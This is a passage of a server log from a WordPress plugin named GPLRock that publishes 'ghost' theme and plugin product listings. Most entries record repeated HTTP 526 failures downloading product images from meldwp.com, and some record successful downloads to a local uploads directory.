UTC] GPLRock WARNING: Image download failed for product serano-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/serano---creative-portfolio-wordpress-theme-2880.webp [04-Apr-2026 21:27:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: serano-creative-portfolio-wordpress-theme [04-Apr-2026 21:27:30 UTC] GPLRock: Image download failed for product music-club-band-dj-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:32 UTC] GPLRock: Image download failed for product music-club-band-dj-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/music-club---band--dj-wordpress-theme-31025.webp for product music-club-band-dj-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:34 UTC] GPLRock: Image download failed for product music-club-band-dj-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:36 UTC] GPLRock: Image download failed for product music-club-band-dj-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/music-club---band--dj-wordpress-theme-31025.webp for product music-club-band-dj-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:38 UTC] GPLRock WARNING: Image download failed for product music-club-band-dj-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/music-club---band--dj-wordpress-theme-31025.webp [04-Apr-2026 21:27:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: music-club-band-dj-wordpress-theme [04-Apr-2026 21:27:39 UTC] GPLRock: Image download failed for product traven-personal-lifestyle-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:41 UTC] GPLRock: Image download failed for product traven-personal-lifestyle-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/traven---personal--lifestyle-blog-wordpress-theme-4282.webp for product traven-personal-lifestyle-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:43 UTC] GPLRock: Image download failed for product traven-personal-lifestyle-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:45 UTC] GPLRock: Image download failed for product traven-personal-lifestyle-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/traven---personal--lifestyle-blog-wordpress-theme-4282.webp for product traven-personal-lifestyle-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:47 UTC] GPLRock WARNING: Image download failed for product traven-personal-lifestyle-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/traven---personal--lifestyle-blog-wordpress-theme-4282.webp [04-Apr-2026 21:27:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: traven-personal-lifestyle-blog-wordpress-theme [04-Apr-2026 21:27:47 UTC] GPLRock: Image download failed for product fiore-flower-shop-florist-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:49 UTC] GPLRock: Image download failed for product fiore-flower-shop-florist-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fiore---flower-shop-florist-ecommerce-wordpress-theme-32143.webp for product fiore-flower-shop-florist-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:52 UTC] GPLRock: Image download failed for product fiore-flower-shop-florist-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:54 UTC] GPLRock: Image download failed for product fiore-flower-shop-florist-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fiore---flower-shop-florist-ecommerce-wordpress-theme-32143.webp for product fiore-flower-shop-florist-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:27:56 UTC] GPLRock WARNING: Image download failed for product fiore-flower-shop-florist-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fiore---flower-shop-florist-ecommerce-wordpress-theme-32143.webp [04-Apr-2026 21:27:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fiore-flower-shop-florist-ecommerce-wordpress-theme [04-Apr-2026 21:27:56 UTC] GPLRock: Image downloaded successfully for product skillfully-a-learning-management-system-lms-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35c2b9bf.webp [04-Apr-2026 21:27:56 UTC] GPLRock: Using pre-downloaded image for product skillfully-a-learning-management-system-lms-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-35c2b9bf.webp [04-Apr-2026 21:27:56 UTC] GPLRock: Ghost product published with image - Product ID: skillfully-a-learning-management-system-lms-theme [04-Apr-2026 21:27:56 UTC] GPLRock: Image download failed for product kitty-fashion-clothing-furniture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:27:58 UTC] GPLRock: Image download failed for product kitty-fashion-clothing-furniture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kitty---fashion-clothing-furniture-wordpress-theme-10825.webp for product kitty-fashion-clothing-furniture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:01 UTC] GPLRock: Image download failed for product kitty-fashion-clothing-furniture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:03 UTC] GPLRock: Image download failed for product kitty-fashion-clothing-furniture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kitty---fashion-clothing-furniture-wordpress-theme-10825.webp for product kitty-fashion-clothing-furniture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:05 UTC] GPLRock WARNING: Image download failed for product kitty-fashion-clothing-furniture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kitty---fashion-clothing-furniture-wordpress-theme-10825.webp [04-Apr-2026 21:28:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kitty-fashion-clothing-furniture-wordpress-theme [04-Apr-2026 21:28:05 UTC] GPLRock: Image download failed for product aki-multipurpose-kids-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:07 UTC] GPLRock: Image download failed for product aki-multipurpose-kids-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aki---multipurpose-kids-wordpress-theme-28968.webp for product aki-multipurpose-kids-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:09 UTC] GPLRock: Image download failed for product aki-multipurpose-kids-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:12 UTC] GPLRock: Image download failed for product aki-multipurpose-kids-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aki---multipurpose-kids-wordpress-theme-28968.webp for product aki-multipurpose-kids-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:14 UTC] GPLRock WARNING: Image download failed for product aki-multipurpose-kids-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aki---multipurpose-kids-wordpress-theme-28968.webp [04-Apr-2026 21:28:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aki-multipurpose-kids-wordpress-theme [04-Apr-2026 21:28:14 UTC] GPLRock: Image download failed for product porfolio-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:16 UTC] GPLRock: Image download failed for product porfolio-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/porfolio---minimal-portfolio-wordpress-theme-10225.webp for product porfolio-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:18 UTC] GPLRock: Image download failed for product porfolio-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:20 UTC] GPLRock: Image download failed for product porfolio-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/porfolio---minimal-portfolio-wordpress-theme-10225.webp for product porfolio-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:22 UTC] GPLRock WARNING: Image download failed for product porfolio-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/porfolio---minimal-portfolio-wordpress-theme-10225.webp [04-Apr-2026 21:28:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: porfolio-minimal-portfolio-wordpress-theme [04-Apr-2026 21:28:31 UTC] GPLRock: Image download failed for product fashion-feast-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:33 UTC] GPLRock: Image download failed for product fashion-feast-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fashion-feast---woocommerce-responsive-theme-26632.webp for product fashion-feast-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:35 UTC] GPLRock: Image download failed for product fashion-feast-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:37 UTC] GPLRock: Image download failed for product fashion-feast-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fashion-feast---woocommerce-responsive-theme-26632.webp for product fashion-feast-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:39 UTC] GPLRock WARNING: Image download failed for product fashion-feast-woocommerce-responsive-theme. URL: https://meldwp.com/wp-content/uploads/fashion-feast---woocommerce-responsive-theme-26632.webp [04-Apr-2026 21:28:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fashion-feast-woocommerce-responsive-theme [04-Apr-2026 21:28:40 UTC] GPLRock: Image download failed for product university-of-education-wordpress-theme-courses-management-wp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:42 UTC] GPLRock: Image download failed for product university-of-education-wordpress-theme-courses-management-wp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/university-of-education-wordpress-theme---courses-management-wp-13121.webp for product university-of-education-wordpress-theme-courses-management-wp after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:44 UTC] GPLRock: Image download failed for product university-of-education-wordpress-theme-courses-management-wp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:46 UTC] GPLRock: Image download failed for product university-of-education-wordpress-theme-courses-management-wp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/university-of-education-wordpress-theme---courses-management-wp-13121.webp for product university-of-education-wordpress-theme-courses-management-wp after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:48 UTC] GPLRock WARNING: Image download failed for product university-of-education-wordpress-theme-courses-management-wp. URL: https://meldwp.com/wp-content/uploads/university-of-education-wordpress-theme---courses-management-wp-13121.webp [04-Apr-2026 21:28:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: university-of-education-wordpress-theme-courses-management-wp [04-Apr-2026 21:28:48 UTC] GPLRock: Image download failed for product oracle-ai-prediction-analytics-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:50 UTC] GPLRock: Image download failed for product oracle-ai-prediction-analytics-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oracle---ai-prediction--analytics-agency-wordpress-theme-25071.webp for product oracle-ai-prediction-analytics-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:53 UTC] GPLRock: Image download failed for product oracle-ai-prediction-analytics-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:55 UTC] GPLRock: Image download failed for product oracle-ai-prediction-analytics-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oracle---ai-prediction--analytics-agency-wordpress-theme-25071.webp for product oracle-ai-prediction-analytics-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:28:57 UTC] GPLRock WARNING: Image download failed for product oracle-ai-prediction-analytics-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oracle---ai-prediction--analytics-agency-wordpress-theme-25071.webp [04-Apr-2026 21:28:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oracle-ai-prediction-analytics-agency-wordpress-theme [04-Apr-2026 21:28:57 UTC] GPLRock: Image downloaded successfully for product urbanite-architect-real-estate-developer-fse-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53584447.webp [04-Apr-2026 21:28:57 UTC] GPLRock: Using pre-downloaded image for product urbanite-architect-real-estate-developer-fse-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53584447.webp [04-Apr-2026 21:28:57 UTC] GPLRock: Ghost product published with image - Product ID: urbanite-architect-real-estate-developer-fse-wordpress-theme [04-Apr-2026 21:28:57 UTC] GPLRock: Image download failed for product caliris-responsive-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:28:59 UTC] GPLRock: Image download failed for product caliris-responsive-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/caliris---responsive-one-page-wordpress-theme-17608.webp for product caliris-responsive-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:02 UTC] GPLRock: Image download failed for product caliris-responsive-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:04 UTC] GPLRock: Image download failed for product caliris-responsive-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/caliris---responsive-one-page-wordpress-theme-17608.webp for product caliris-responsive-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:06 UTC] GPLRock WARNING: Image download failed for product caliris-responsive-one-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/caliris---responsive-one-page-wordpress-theme-17608.webp [04-Apr-2026 21:29:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: caliris-responsive-one-page-wordpress-theme [04-Apr-2026 21:29:06 UTC] GPLRock: Image downloaded successfully for product evenz-conference-and-event-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5ed0e52.webp [04-Apr-2026 21:29:06 UTC] GPLRock: Using pre-downloaded image for product evenz-conference-and-event-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5ed0e52.webp [04-Apr-2026 21:29:06 UTC] GPLRock: Ghost product published with image - Product ID: evenz-conference-and-event-wordpress-theme [04-Apr-2026 21:29:06 UTC] GPLRock: Image download failed for product finmag-modern-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:08 UTC] GPLRock: Image download failed for product finmag-modern-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finmag---modern-magazine-wordpress-theme-31043.webp for product finmag-modern-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:10 UTC] GPLRock: Image download failed for product finmag-modern-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:12 UTC] GPLRock: Image download failed for product finmag-modern-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finmag---modern-magazine-wordpress-theme-31043.webp for product finmag-modern-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:14 UTC] GPLRock WARNING: Image download failed for product finmag-modern-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finmag---modern-magazine-wordpress-theme-31043.webp [04-Apr-2026 21:29:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finmag-modern-magazine-wordpress-theme [04-Apr-2026 21:29:15 UTC] GPLRock: Image download failed for product roundex-circular-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:17 UTC] GPLRock: Image download failed for product roundex-circular-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roundex---circular-portfolio-wordpress-theme-8500.webp for product roundex-circular-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:19 UTC] GPLRock: Image download failed for product roundex-circular-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:21 UTC] GPLRock: Image download failed for product roundex-circular-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roundex---circular-portfolio-wordpress-theme-8500.webp for product roundex-circular-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:23 UTC] GPLRock WARNING: Image download failed for product roundex-circular-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/roundex---circular-portfolio-wordpress-theme-8500.webp [04-Apr-2026 21:29:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: roundex-circular-portfolio-wordpress-theme [04-Apr-2026 21:29:23 UTC] GPLRock: Image download failed for product bitpal-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:26 UTC] GPLRock: Image download failed for product bitpal-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bitpal---cryptocurrency-wordpress-theme-19739.webp for product bitpal-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:28 UTC] GPLRock: Image download failed for product bitpal-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:30 UTC] GPLRock: Image download failed for product bitpal-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bitpal---cryptocurrency-wordpress-theme-19739.webp for product bitpal-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:32 UTC] GPLRock WARNING: Image download failed for product bitpal-cryptocurrency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bitpal---cryptocurrency-wordpress-theme-19739.webp [04-Apr-2026 21:29:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bitpal-cryptocurrency-wordpress-theme [04-Apr-2026 21:29:32 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:34 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seabreeze---restaurant-and-cafe-wordpress-theme-2384.webp for product seabreeze-restaurant-and-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:29:36 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:29:38 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:38:40 UTC] GPLRock: Image downloaded successfully for product calendarize-it-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ad78845.jpg [04-Apr-2026 21:38:40 UTC] GPLRock: Using pre-downloaded image for product calendarize-it-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ad78845.jpg [04-Apr-2026 21:38:40 UTC] GPLRock: Ghost product published with image - Product ID: calendarize-it-for-wordpress [04-Apr-2026 21:38:42 UTC] GPLRock: Image downloaded successfully for product wp-full-stripe-subscription-and-payment-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d8a0c0f.jpg [04-Apr-2026 21:38:42 UTC] GPLRock: Using pre-downloaded image for product wp-full-stripe-subscription-and-payment-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2d8a0c0f.jpg [04-Apr-2026 21:38:42 UTC] GPLRock: Ghost product published with image - Product ID: wp-full-stripe-subscription-and-payment-plugin-for-wordpress [04-Apr-2026 21:38:44 UTC] GPLRock: Image downloaded successfully for product hyperx-responsive-wordpress-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7cc833e.jpg [04-Apr-2026 21:38:44 UTC] GPLRock: Using pre-downloaded image for product hyperx-responsive-wordpress-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7cc833e.jpg [04-Apr-2026 21:38:44 UTC] GPLRock: Ghost product published with image - Product ID: hyperx-responsive-wordpress-portfolio-theme [04-Apr-2026 21:38:45 UTC] GPLRock: Image downloaded successfully for product wp-amp-accelerated-mobile-pages-for-wordpress-and-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9511e3f1.jpg [04-Apr-2026 21:38:46 UTC] GPLRock: Using pre-downloaded image for product wp-amp-accelerated-mobile-pages-for-wordpress-and-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9511e3f1.jpg [04-Apr-2026 21:38:46 UTC] GPLRock: Ghost product published with image - Product ID: wp-amp-accelerated-mobile-pages-for-wordpress-and-woocommerce [04-Apr-2026 21:38:47 UTC] GPLRock: Image downloaded successfully for product convertplus-popup-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a186378f.jpg [04-Apr-2026 21:38:47 UTC] GPLRock: Using pre-downloaded image for product convertplus-popup-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a186378f.jpg [04-Apr-2026 21:38:47 UTC] GPLRock: Ghost product published with image - Product ID: convertplus-popup-plugin-for-wordpress [04-Apr-2026 21:38:49 UTC] GPLRock: Image downloaded successfully for product learnpress-instructor-commission (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99d63c75.jpg [04-Apr-2026 21:38:49 UTC] GPLRock: Using pre-downloaded image for product learnpress-instructor-commission: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99d63c75.jpg [04-Apr-2026 21:38:49 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-instructor-commission [04-Apr-2026 21:38:50 UTC] GPLRock: Image downloaded successfully for product gravity-flow-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89677bd9.jpg [04-Apr-2026 21:38:50 UTC] GPLRock: Using pre-downloaded image for product gravity-flow-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89677bd9.jpg [04-Apr-2026 21:38:50 UTC] GPLRock: Ghost product published with image - Product ID: gravity-flow-wordpress-plugin [04-Apr-2026 21:38:51 UTC] GPLRock: Image downloaded successfully for product yith-custom-thank-you-page-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9134aedd.jpg [04-Apr-2026 21:38:51 UTC] GPLRock: Using pre-downloaded image for product yith-custom-thank-you-page-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9134aedd.jpg [04-Apr-2026 21:38:51 UTC] GPLRock: Ghost product published with image - Product ID: yith-custom-thank-you-page-for-woocommerce-premium [04-Apr-2026 21:38:53 UTC] GPLRock: Image downloaded successfully for product woo-product-grid-list-design-responsive-products-showcase-extension-for-woocommerce-1-0-7 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f5ecc90.jpg [04-Apr-2026 21:38:53 UTC] GPLRock: Using pre-downloaded image for product woo-product-grid-list-design-responsive-products-showcase-extension-for-woocommerce-1-0-7: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f5ecc90.jpg [04-Apr-2026 21:38:53 UTC] GPLRock: Ghost product published with image - Product ID: woo-product-grid-list-design-responsive-products-showcase-extension-for-woocommerce-1-0-7 [04-Apr-2026 21:38:54 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc5c818e.jpg [04-Apr-2026 21:38:54 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc5c818e.jpg [04-Apr-2026 21:38:54 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-mailchimp [04-Apr-2026 21:39:46 UTC] GPLRock: Image downloaded successfully for product bcom-consulting-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e82b465a.png [04-Apr-2026 21:39:46 UTC] GPLRock: Using pre-downloaded image for product bcom-consulting-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e82b465a.png [04-Apr-2026 21:39:46 UTC] GPLRock: Ghost product published with image - Product ID: bcom-consulting-business-wordpress-theme [04-Apr-2026 21:39:49 UTC] GPLRock: Image downloaded successfully for product hara-beauty-and-cosmetics-shop-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c18827a6.png [04-Apr-2026 21:39:49 UTC] GPLRock: Using pre-downloaded image for product hara-beauty-and-cosmetics-shop-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c18827a6.png [04-Apr-2026 21:39:49 UTC] GPLRock: Ghost product published with image - Product ID: hara-beauty-and-cosmetics-shop-woocommerce-theme [04-Apr-2026 21:39:51 UTC] GPLRock: Image downloaded successfully for product king-viral-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10f83fc7.png [04-Apr-2026 21:39:51 UTC] GPLRock: Using pre-downloaded image for product king-viral-magazine-wordpress-theme: 